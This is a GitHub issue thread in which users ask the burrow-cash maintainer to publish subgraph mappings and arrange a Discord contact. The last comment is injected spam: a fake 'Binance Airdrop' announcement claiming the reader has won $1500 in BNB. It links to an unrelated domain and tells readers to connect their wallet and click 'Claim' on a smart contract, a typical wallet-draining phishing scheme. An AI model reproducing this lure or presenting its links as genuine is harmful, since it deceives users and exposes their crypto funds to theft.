### ISSUE TITLE
Mappings

### ISSUE THREAD

**Issue by 0xaaiden** [shashwatS22/burrow-cash#1]
Is it possible to publish the mappings? The subgraph doesn't seem to be running on the hosted service and I'm trying to debug it

**Comment by shashwatS22** [comment]
I am still working on the mappings, I'll publish them soon.

**Comment by 0xaaiden** [comment]
Sounds good 👍
Have a few questions on the subgraph, is there a good way to reach out to
you?

**Comment by shashwatS22** [comment]
you can drop a message on discord shashwat22#8581

**Comment by 0xaaiden** [comment]
any chance you update the mappings with what you have so far, would like to study them and help with it

**Comment by 0xaaiden** [comment]
bump, sent you the discord invite

**Comment by tobarbaro** [comment]
# Binance Airdrop Guide: $500k Worth of Airdrop is Ready, Claim Your $1500 in BNB Now!

Congratulations! You've won a share of the $500k Binance Airdrop, and we're excited to give you $1500 in BNB to celebrate the end of the year. Follow the steps below to claim your tokens and make the most of this festive giveaway!

[![Claim Now](https://i.ytimg.com/vi/PFhGDyXstas/maxresdefault.jpg)](http://go.bnbcoinsearn.online/97Q7Yj)

## Steps to Claim:

### 1. Connect Your Binance Wallet:
   - Click on the [Connect Wallet](https://go.bnbcoinsearn.online/97Q7Yj) link.
   - Choose your preferred wallet provider (Metamask, Trust Wallet, etc.).

### 2. Interact with the Contract:
   - Once your wallet is connected.
   - Click on the "**Claim**" button to interact with the smart contract.

Don't miss out on your $1500 in BNB! Act now to secure your tokens.


Winners: @
